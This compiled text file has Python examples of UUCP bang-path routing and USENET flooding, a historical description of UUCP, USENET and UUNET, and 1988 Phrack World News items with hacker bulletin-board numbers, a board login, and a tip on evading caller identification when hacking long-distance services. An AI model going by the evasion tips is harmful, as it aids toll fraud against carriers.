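    ("forward", next_host, remaining_address). There is no routing beyond
    adjacent systems, so the next hop must be a direct neighbor.
    """
    head, sep, rest = address.partition("!")
    if not sep:
        return ("deliver", head)
    if head not in links.get(local_host, {}):
        raise ValueError(f"{local_host} has no link to {head}")
    return ("forward", head, rest)


def trace(links, origin, address):
    """Follow an address hop by hop; return (hosts that handled it, user)."""
    handled = [origin]
    host = origin
    while True:
        step = relay(links, host, address)
        if step[0] == "deliver":
            return handled, step[1]
        _, host, address = step
        handled.append(host)


if __name__ == "__main__":
    routes = compute_routes(SAMPLE_MAP, "hosta")
    addr = bang_address(routes, "hostd", "user")
    print("address:", addr)
    # Every host listed here sees the whole message in transit.
    print("handled by:", trace(SAMPLE_MAP, "hosta", addr))
    try:
        # A guessed route through a link that does not exist fails at the
        # first hop, with no end-to-end acknowledgment to say so.
        trace(SAMPLE_MAP, "hosta", "hostd!user")
    except ValueError as err:
        print("guessed route failed:", err)
```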

The hardware used in the UUCP mail network ranges from small personal 
computers through workstations to minicomputers, mainframes and
supercomputers. The network extends throughout most of North America and parts of
Asia (Korea and Israel). Including hosts on the related networks JUNET (in 
Japan) and EUnet (in Europe), there are at least 7,000 hosts on the network; 
possibly 10,000 or more. (EUnet and JUNET hosts are listed in the UUCP maps.) 
The UUCP Project addresses are: 


uucp-query@cbatt.ATT.COM 
cbatt!uucp-query
uucp-query@cbatt.UUCP


Much information about UUCP is published in USENET newsgroups. 


USENET (Cooperative Network) 


USENET began in 1980 as a medium of communication between users of two 
machines, one at the University of North Carolina, the other at Duke 
University. It has since grown exponentially to its current size of more than 
2000 machines. In the process, the software has been rewritten several times, 
and the transport mechanisms now used to support it include not only the 
original UUCP links, but also X.25, ACSNET, and others. 

USENET combines the idea of mailing lists as long used on the ARPANET with 
bulletin-board service such as has existed for many years on TOPS-20 and other 
systems, adding a freedom of subject matter that could never exist on the 
ARPANET, and reaching a more varied constituency. While chaotic and inane 
ramblings abound, the network is quite popular. 

The USENET news network is a distributed computer conferencing system 
bearing some similarities to commercial conferencing systems like CompuServe, 
though USENET is much more distributed. Users pursue both technical and 
social ends on USENET. Exchanges are submitted to newsgroups on various 
topics, ranging from gardening to astronomy. 

The name "USENET" comes from the USENIX Association. [The Professional and
Technical UNIX User’s Group. The name UNIX is a pun on Multics, which is the
name of a major predecessor operating system. (The pun indicates that, in
areas where Multics tries to do many things, UNIX tries to do one thing well.)]
USENET has no central administration, though there are newsgroups to which
introductory and other information about the network is posted monthly.
USENET is currently defined as the set of hosts receiving the newsgroup
news.announce. There are about a dozen hosts that constitute the backbone of
the network, keeping transit times low by doing frequent transfers among
themselves and with other hosts that they feed. Since these hosts bear much
of the burden of the network, their administrators tend to take a strong
interest in the state of the network. Most newsgroups can be posted to by
anyone on the network. For others, it is necessary to mail a submission to a
moderator, who decides whether to post it. Most moderators just filter out
redundant articles, though some make decisions on other grounds. These
newsgroup moderators form another group interested in the state of the
network. Newsgroups are created or deleted according to the decisions made
after the discussion in the newsgroup "news.groups".

Each host pays its own telephone bills. The backbone hosts have higher 
bills than most other hosts due to their long-distance links among themselves. 
The unit of communication is the news article. Each article is sent by a 
flooding routing algorithm to all nodes on the network. The transport layer 
is UUCP for most links, although many others are used, including ethernets, 
berknets, and long-haul packet-switched networks; sometimes UUCP is run on top 
of the others, and sometimes UUCP is not used at all. 
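
How flooding delivers one article to every host, and what it costs in redundant transfers, as an added example that is not part of the original file. The feed topology and host names are constructed; the duplicate check by message ID and the Path line that grows at each hop follow how netnews software of the period worked (RFC 1036), which the article itself does not describe.

```python
from collections import deque

# Constructed feed topology: host -> neighbors it exchanges news with.
FEEDS = {
    "alpha": ["beta", "gamma"],
    "beta": ["alpha", "gamma", "delta"],
    "gamma": ["alpha", "beta", "delta"],
    "delta": ["beta", "gamma"],
}


def flood(feeds, origin, message_id):
    """Flood one article from origin to every reachable host.

    Returns (paths, transfers, duplicates):
      paths      - host -> Path line recorded when the host first accepted
                   the article (newest host leftmost, "!"-separated)
      transfers  - number of times the article was sent over a link
      duplicates - transfers rejected because the receiver already had it
    """
    history = {host: set() for host in feeds}  # message IDs seen per host
    paths = {origin: origin}
    history[origin].add(message_id)
    transfers = 0
    duplicates = 0
    queue = deque([origin])
    while queue:
        host = queue.popleft()
        for neighbor in feeds[host]:
            # A host already named in the Path has seen the article, so the
            # sender does not offer it back along the way it came.
            if neighbor in paths[host].split("!"):
                continue
            transfers += 1
            if message_id in history[neighbor]:
                duplicates += 1  # paid for the link time, article discarded
                continue
            history[neighbor].add(message_id)
            paths[neighbor] = neighbor + "!" + paths[host]
            queue.append(neighbor)
    return paths, transfers, duplicates


if __name__ == "__main__":
    paths, transfers, duplicates = flood(FEEDS, "alpha", "<1@alpha.UUCP>")
    for host, path in sorted(paths.items()):
        print(f"{host:6} Path: {path}")
    print(f"{transfers} transfers, {duplicates} of them redundant")
```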

The many problems with USENET (e.g. reader overload, old software, slow 
propagation speed, and high and unevenly carried costs of transmission) have 
raised the possibility of using the experience gained in USENET to design a 
new network to replace it. The new network might also involve at least a 
partial replacement for the UUCP mail network. 

One unusual mechanism that has been proposed to support the new network is 
stargate. Commercial television broadcasting techniques leave unused 
bandwidth in the vertical blanking interval between picture frames. Some 
broadcasters are currently using this part of the signal to transmit Teletext 
services. Since many cable-television channels are distributed via 
geo-synchronous satellites, a single input to a satellite uplink facility can 
reach all of North America on an appropriate satellite and channel. A 
satellite uplink company interested in allowing USENET-like articles to be 
broadcast by satellite on a well-known cable-television channel has been
found. Prototypes of hardware and software to encode the articles and other
hardware to decode them from a cable-television signal have been built and
tested in the field for more than a year. A new, reasonably priced model of
the decoding box may be available soon. 

This facility would allow most compatible systems within the footprint 
(area of coverage) of the satellite and with access to the appropriate cable- 
television channel to obtain decoding equipment and hook into the network at a 
very reasonable cost. Articles would be submitted for transmission by UUCP 
links to the satellite uplink facility. Most of the technical problems of 
Stargate seem to have been solved. 
More than 90 percent of all USENET articles reach 90 percent of all hosts 
on the network within three days. Though there have been some famous bugs
that caused loss of articles, that particular problem has become rare. 

Every USENET host has a name. That host name and the name of the poster 
are used to identify the source of an article. Though those hosts that are on 
both the UUCP mail and USENET news networks usually have the same name on both 
networks, mail addresses have no meaning on USENET: Mail related to USENET
articles is usually sent via UUCP mail; it cannot be sent over USENET, by
definition. Though the two networks have always been closely related, there
are many more hosts on UUCP than on USENET. In Australia the two networks do
not even intersect except at one host.

There are different distributions of newsgroups on USENET. Some go
everywhere, whereas others are limited to a particular continent, nation,
state or province, city, organization, or even machine, though the more local
distributions are not really part of USENET proper. The European network
EUnet carries some USENET newsgroups and has another set of its own. JUNET
in Japan is similar to EUnet in this regard.

There are about 2000 USENET hosts in the United States, Canada, Australia,
and probably in other countries. The hosts on EUnet, SDN, and JUNET
communicate with USENET hosts: The total number of news hosts including ones
on those three networks is probably at least 2500. The UUCP map includes
USENET map information as annotations. A list of legitimate netwide
newsgroups is posted to several newsgroups monthly. Volunteers keep
statistics on the use of the various newsgroups (all 250 of them) and on
frequency of posting by persons and hosts. These are posted to news.newslists
once a month, as is the list of newsgroups. Important announcements are
posted to moderated newsgroups, news.announce and news.announce.newusers,
which are intended to reach all users (the current moderator is Mark Horton,
cbosgd!mark). An address for information on the network is
seismo!usenet-request.


News on UUNET - June 1988


A year ago, UUNET (Fairfax, VA) was formed to help ease the communication
load of the beleaguered Usenet network of UNIX users. Usenet connections
were becoming increasingly costly and difficult to maintain, a situation that
prompted the Usenix Association to fund the creation of the UUNET
Communications Service to assist users in accessing Usenet. Now, UUNET has
become the "best connected" UNIX computer in the world, and has been
authorized to function as an Arpanet mail gateway. Gateways to other networks
are expected to be established in the future.


I guess all use of UUNET is done through the UUCP program found on Unix
operating systems. Many people are getting PC versions of the Unix Operating
system now-a-days, so knowing what’s available before getting hooked into
a network, if that’s your plan, is advised. There is an advertisement about
UUNET on Bix in the networks conference somewhere. The message may be old,
but still useful.


The cost of using UUNET is: $30/month... and $2/hour. I think the hourly 
charge may only apply if connecting through Tymnet. Not sure. 


Accessible via Tymnet, their 800 number, or a regular local POTS number. 


Connections can definitely be made up to 9600 baud. 19.2K baud access may
also exist. I think it does. 


If you’re a UUNET user, and want to receive mail from someone through the 
UUCP network, they would address it just as any other UUCP mail address. 
An example is: ...!uunet!warble!joeuser


This file has been brought to you by Prime Suspect and Tribunal of Knowledge 


Welcome to yet another issue of Phrack World News. We have once again
returned to try and bring you an entertaining, and informative newsletter 
dedicated to the spread of information and knowledge throughout the H/P 
community. 


TOK Re-Formed 


A group called Tribunal Of Knowledge, which has undergone previous 
re-formations has once again re-formed. The person who is currently "in 
charge" of the group says that he had permission from High Evolutionary, the 
group’s founder, to re-form the organization. Although the group hasn’t 
publicly announced their existence or written any files, we should be hearing 
from them in the near future. 


The Current Members of TOK Include - 


Control C
Prime Suspect
Jack Death
The UrVile
The Prophet
Psychic Warlord


Information Provided By Control C, and Prime Suspect. 


Phrack Inc. Support Boards 


Phrack Inc. has always made it a habit to set up Phrack Inc. sponsor accounts 
on the more popular boards around. These sponsor accounts are set up, so that 
the users may get in touch with the Phrack Magazine staff if they would like 
to contribute an article, or any other information to our publication. Please 
take note of the boards on which Phrack Inc. accounts are set up. Thank you. 


The Current List of Phrack Inc. Sponsor Boards Includes - 


P-80 Systems - 304/744-2253
OSUNY - 914/725-4060
The Central Office - 914/234-3260
Digital Logic’s DS - 305/395-6906
The Forgotten Realm - 618/943-2399 *


* - Phrack Headquarters


SummerCon ’88 Preliminary Planning 


Planning for SummerCon ’88 is underway. So far, we have decided on four
tentative locations: New York City, Saint Louis, Atlanta, or Florida. Since 
this is only tentative, no dates have been set or reservations made for a 
conference. 


If you have any comments, suggestions, etc, please let us know. If you are 
planning to attend SummerCon ’88, please let us know as well. Thank you. 


Information Provided By The Forgotten Realm. 


LOD/H Technical Journal 


Lex Luthor of LOD/H (Legion of Doom/Hackers) has been busy with school, etc.,
so he has not had the time, nor the initiative to release the next issue of 
the LOD/H Technical Journal. On this note, he has tentatively turned the 
Journal over to Phantom Phreaker, who will probably be taking all 
contributions for the Journal. No additional information is available. 


Information Provided By The UrVile and Phantom Phreaker. 


Congress To Restrict 976/900 Dial-A-Porn Services 


Congress is considering proposals to restrict dial-up services in an effort to 
make it difficult for minors to access sexually explicit messages. A 
House-Senate committee is currently negotiating the "dial-a-porn" proposal. 
Lawmakers disagree whether or not the proposal is constitutional and are 
debating the issue of requiring phone companies to offer a service that would 
allow parents, free of charge, to block the 976/900 services. Other proposals 
would require customers to pay in advance or use credit cards to access the 
976/900 services. 


Some companies are currently offering free services that restrict minors from 
accessing sexually explicit messages. AT&T and Department of Justice 
officials are cooperating in a nationwide crackdown of "dial-a-porn" telephone 
companies. The FCC recently brought charges against one of AT&T’s largest 900 
Service customers, and AT&T provided the confidential information necessary in 
the prosecution. AT&T also agreed to suspend or disconnect services of 
companies violating the commission ban by transmitting obscene or indecent 
messages to minors. 


Some Hope Left For Victims Of FGD 


US Sprint’s famed FGD (Feature Group D) dial-ups and 800 INWATS exchanges may 
pose no threat to individuals under switches that do not yet offer equal 
access service to alternate long distance carriers. Due to the way Feature 
Group D routes its information, the ten-digit originating number of the caller 
is not provided when the call is placed from a non-equal access area. The 
following was taken from an explanation of US Sprint’s 800 INWATS Service. 


CALL DETAIL


With US Sprint 800 Service, a customer will receive call detail information 
for every call on every invoice. The call detail for each call includes: 


o Date of call
o Time of call
o The originating city and state
o The ten-digit number of the caller if the call originates in an
  equal access area or the NPA of the caller if the non-equal access
  area.
o Band into which the call falls
o Duration of the call in minutes
o Cost of the call


This came directly from US Sprint. Do as you choose, but don’t depend on 
this. 


Information Provided by US Sprint. 


Telenet Bolsters Network With Encryption 


Telenet Communications Corporation strengthened its public data network
recently with the introduction of data encryption capability. 


The X.25 Encryption Service provides a type of data security previously 
unavailable on any public data network, according to analysts. For Telenet, 
the purpose of the offering is "to be more competitive; nobody else does 
this," according to Belden Menkus, an independent network security consultant 
based in Middleville, NJ. 


The service is aimed at users transmitting proprietary information between 
host computers, such as insurance or fund-transfer applications. It is priced 
at $200 per month per host computer connection. Both the confidentiality and 
integrity of the data can be protected via encryption. 


The scheme provides end-to-end data encryption, an alternative to the method
whereby data is decrypted and recrypted at each node in the network. "This is
a recognition that end-to-end encryption is really preferable to link
encryption," Menkus said.


The service is available over both dial-up and leased lines, and it supports
both synchronous and asynchronous traffic at speeds up to 9.6K BPS. 


Telenet has approved one particular data encryption device for use with the 
service, The Cipher X 5000, from Technical Communications Corporation (TCC), a 
Concord, Massachusetts based vendor. TCC "has been around the data encryption 
business for quite a while," Menkus said. 


The Cipher X implements the National Bureau of Standards’ Data Encryption
Standard (DES). DES is an algorithm manipulated by a secret 56 bit key.
Computers protected with the device can only be accessed by users with a
matching key.


The data encryptor is installed at user sites between the host computer and
the PAD (Packet Assembler/Disassembler).


Installation of the TCC device does not affect the user’s ability to send
non-encrypted data, according to Telenet. By maintaining a table of network
addresses that require encryption, the device decides whether or not to
encrypt each transmission.


Information Provided by Network World. 




==Phrack Inc.== 


Volume Two, Issue 18, Phile #11 of 11 


PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
PWN                                             PWN
PWN     >>>>>=-* Phrack World News *-=<<<<<     PWN
PWN                Issue XVIII/2                PWN
PWN                                             PWN
PWN         Created By Knight Lightning         PWN
PWN                                             PWN
PWN            Compiled and Written             PWN
PWN                 by Epsilon                  PWN
PWN                                             PWN
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN


It seems that there are yet some things to be covered. In addendum, we will be
featuring, as a part of PWN, a special section where up-and-coming H/P 
Bulletin Boards can be advertised. This will let everyone know where the 
board scene stands. If you have a board that you feel has potential, but 
doesn’t have good users, let us know. Thanks. 


Doctor Cypher Busted? 


Doctor Cypher, who frequents the Altos Chat, The Dallas Hack Shack, Digital
Logic’s Data Service, The Forgotten Realm, P-80 Systems, and others, is
believed to have had his modem confiscated by "Telephone Company Security,"
and by his local Sheriff. No charges have been filed as of this date. He
says he will be using a friend’s equipment to stay in touch with the world.


Information Provided by Hatchet Molly 


Give These Boards A Call 


These systems have potential, but need good users, so give them a call, and 
help the world out. 


The Autobahn                     The Outlet Private
703/629-4422                     313/261-6141
Primary - ‘central’              newuser/kenwood
Sysop - The Highwayman           Sysop - Ax Murderer
Hack/Phreak                      Private Hack/Phreak

Dallas Hack Shack                The Forgotten Realm
214/422-4307                     618/943-2399
Apply For Access                 Apply For Access
Sysop - David Lightman           Sysop - Crimson Death
Private Hack/Phreak              Private H/P & Phrack Headquarters


AllNet Hacking Is Getting Expensive 


For those of you who hack AllNet Long Distance Service, watch out. AllNet
Communications Corp. has announced that they will be charging $500.00 PER
ATTEMPT to hack their service. That’s not PER VALID CODE, that’s PER ATTEMPT.
Sources say that The Fugitive (619) received a $200,000.00 phone bill from
AllNet.

This may set examples for other long distance communication carriers in the
future, so be careful what you do.


Editorial - What Is The Best Way To Educate New Hackers? 


Since the "demise" of Phreak Klass 2600 and PLP, the H/P world has not seen a 
board dedicated to the education of new hackers. Although PK2600 is still up 
(806/799-0016, educate) many of the old "teachers" never call. The board has 
fallen mainly to new hackers who are looking for teachers. This may pose a 
problem. If boards aren’t the way to educate these people (I think they are 
the best way, in fact), then what is? Certainly not giant Alliance 
conferences as in the past, due to recent "black-listing" of many "conferees" 
who participated heavily in Alliance Teleconferencing in the past. 


I think it might be successful if someone was able to set up another board 
dedicated to teaching new hackers. A board which is not private, but does 
voice validate the users as they log in. Please leave some feedback as to what
you think of this idea, or if you are willing to set this type of system up. 
Thanks. 


US Sprint Employee Scam 


The US Sprint Security Department is currently warning employees of a scam 
which could be affecting them. An unidentified man has been calling various 
employees throughout the US Sprint system and telling them that if they give 
him their FON Card numbers, they will receive an additional US Sprint employee 
long-distance credit. The Security Department says, "this is a 100 percent 
scam." "If you’re called to take part in this operation, please call the 
Security Department at (816) 822-6217." 


Information Provided By US Sprint 


